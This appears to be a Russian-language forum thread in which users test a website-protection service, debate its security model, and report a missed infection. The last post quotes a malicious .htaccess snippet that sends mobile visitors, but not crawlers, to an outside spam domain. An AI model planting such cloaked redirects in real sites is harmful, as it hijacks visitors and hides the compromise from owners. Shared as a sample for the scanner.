Сервис защиты сайтов - Тестеры нужны

Согласен, идея данная весьма не айс.

Новые планы:

- Использование сигнатур айболита для анализа JS-скриптов ( с согласия автора)

- Редирект при переходе с поисковиков.

Важно:

Очень не рекомендую использовать mail.ru

Он стал опять помечать письма как спам, опять переписка и потеря уведомлений.

О! это дело :) Очень нужное дело.

Порция инвайтов:

Как такое возможно?

Та же саповская папка с генерируемыми названиями - открыта для паблика? Почему нельзя пойти этим путём?

Разными способами. В зависимости от способов хранения, передачи и обработке этой инфы. К тому же совсем не исключается взлом самого сервиса:

.. всех сайтах всех клиентов.

А смысл?

Ида, саповская папка менее интересная цель, нежели инфа о файловой структуре всего сайта.

Если не известно имя файла, каналы и структура передаваемой информации, то что ещё можно сделать?

Что дадут хэш и/или зашифрованные данные злоумышленнику? Пути к файлам, содержимое файлов и всё остальное ведь из них не извлечёшь.

К тому же, здоровый уровень паранойи лично мне подсказывает, что актуальнее будет опасаться взлома самого ресурса, а не сервиса его защиты. Если

1) код клиентских скриптов и без того лежит в открытом доступе и выполняет минимум функций,

2) конкретные файлы шифруются и индивидуализируются для каждого защищённого сайта, а

3) взлом самого сервиса даст БД с абракадаброй в виде ID сайта без URL, и кучей зашифрованных значений для него, вида $5$4dRhhKytf3f9liv^^^DrGqcX73. И что с этим делать?

То бишь, мне не видно сейчас явно уязвимое место.

1. Не факт, что не станет известно.

2. Не факт, что злоумышленник сможет завладеть не только "знаниями", а и не посредственно самими файлами. (я к тому, что само их наличие - потенциальная дыра)

3. Топик для обсуждения сервиса, а не обучалка взломов (тем более, что я не учитель)

Было бы желание ;) Но да, смотря какой хеш.

А уровень простого здравого смысла что тебе подсказывает, отвечая на вопрос - чем, в плане безопасности, отличается сервис одиночки (в см не мегакорпораций типа гугла\МС\етс), крутящийся на серверах хенцера, от сайтов таких же одиночек или даже крупных компаний-клиентов сервиса? А о взломе того же твиттера или маилру или ещё 100500 гораздо более защищённых ресов ты тоже не слышал?

Я тебя успокою - ты совсем не одинок в этом. Тысячи или даже миллионы юзеров по всему миру пользуются сервисами, предлагающими залить себе шелл и спать спокойно :)

Если интересно - почитай топики, ссылки на которые я дал в 70 посте.

В общем, надо предметно разговаривать. Этак любой .php можно обозвать потенциальной дырой.

И да, наличие на сервере, смотрящем в мир, Апача/IIE и .htaccess - тоже потенциальная дыра. При чём о-го-го какая.

забрал 87f32bde6c6f3ad4f14e. Будем посмотреть ;)

Один из сайтов подхватил мобильный редирект в .htaccess сервисом просканировал, но вирус сервис не нашел, хотя там банально в .htaccess был ред прописан.

Если нужно, то вот код редиректа

RewriteCond %{HTTP_USER_AGENT} (android|midp|j2me|symbian|series\ 60|symbos|windows\ mobile|windows\ ce|ppc|smartphone|blackberry|mtk|windows\ phone|iemobile|nokia|ucweb|ucbrowser|iPad|iPhone) [NC]

RewriteCond %{HTTP_USER_AGENT} !(bot|ia_archiver|crawler|slurp|validator|webalta|yahoo|yandex|google|curl|wget) [NC]

RewriteRule (.*) http://m.extrasoftware.biz/?19&source=31.31.196.44 [L,R=302] # On